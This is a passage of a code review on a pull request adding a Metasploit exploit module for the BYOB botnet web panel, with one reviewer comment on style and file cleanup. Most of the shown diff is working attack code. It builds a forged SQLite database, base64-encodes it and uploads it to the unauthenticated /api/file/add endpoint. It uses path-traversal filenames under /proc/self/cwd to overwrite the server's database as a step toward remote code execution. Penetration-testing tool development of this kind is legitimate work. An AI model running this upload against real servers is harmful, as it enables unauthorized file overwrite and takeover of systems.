modules/exploits/unix/webapp/byob_unauth_rce.rb

```diff
@@ -0,0 +1,367 @@
+            );
+    SQL
+
+    mem_db.execute <<-SQL
+            CREATE TABLE payload (
+            id INTEGER NOT NULL,
+            filename VARCHAR(34) NOT NULL,
+            operating_system VARCHAR(3),
+            architecture VARCHAR(14),
+            created DATETIME NOT NULL,
+            owner VARCHAR(120) NOT NULL,
+            PRIMARY KEY (id),
+            UNIQUE (filename),
+            FOREIGN KEY(owner) REFERENCES user (username)
+            );
+    SQL
+
+    mem_db.execute <<-SQL
+            CREATE TABLE exfiltrated_file (
+            id INTEGER NOT NULL,
+            filename VARCHAR(34) NOT NULL,
+            session VARCHAR(15) NOT NULL,
+            module VARCHAR(15) NOT NULL,
+            created DATETIME NOT NULL,
+            owner VARCHAR(120) NOT NULL,
+            PRIMARY KEY (id),
+            UNIQUE (filename),
+            FOREIGN KEY(owner) REFERENCES user (username)
+            );
+    SQL
+
+    mem_db.execute <<-SQL
+            CREATE TABLE task (
+            id INTEGER NOT NULL,
+            uid VARCHAR(32) NOT NULL,
+            task TEXT,
+            result TEXT,
+            issued DATETIME NOT NULL,
+            completed DATETIME,
+            session VARCHAR(32) NOT NULL,
+            PRIMARY KEY (id),
+            UNIQUE (uid),
+            FOREIGN KEY(session) REFERENCES session (uid)
+            );
+    SQL
+
+    file = Tempfile.new('database.db')
+    src_db = SQLite3::Database.new(file.path)
+    backup = SQLite3::Backup.new(src_db, 'main', mem_db, 'main')
+    backup.step(-1)
+    backup.finish
+
+    binary_data = File.binread(file.path)
+
+    base64_data = Rex::Text.encode_base64(binary_data)
+
+    file.close
+    file.unlink
+
+    base64_data
+  end
+
+  def upload_database_multiple_paths(encoded_db)
+    success = false
+    filepaths = [
+      '/proc/self/cwd/buildyourownbotnet/database.db',
+      '/proc/self/cwd/../buildyourownbotnet/database.db',
+      '/proc/self/cwd/../../../../buildyourownbotnet/database.db',
+      '/proc/self/cwd/instance/database.db',
+      '/proc/self/cwd/../../../../instance/database.db',
+      '/proc/self/cwd/../instance/database.db'
+    ]
+
+    filepaths.each do |filepath|
+      vprint_status("Trying to upload database to path: #{filepath}")
+
+      form_data = {
+        'data' => encoded_db,
+        'filename' => filepath,
+        'type' => 'txt',
+        'owner' => Faker::Internet.username,
+        'module' => Faker::App.name.downcase,
+        'session' => Faker::Alphanumeric.alphanumeric(number: 8)
+      }
+
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'api', 'file', 'add'),
+        'ctype' => 'application/x-www-form-urlencoded',
+        'vars_post' => form_data,
+        'keep_cookies' => true
+      )
+
+      if res&.code == 200
+        (print_good("Database uploaded successfully to path: #{filepath}")
+         success = true)
```

Comment:
```suggestion
        print_good("Database uploaded successfully to path: #{filepath}")
        success = true
```

The paths where the database is successfully written to should be registered for cleanup using the FileDropper mixin.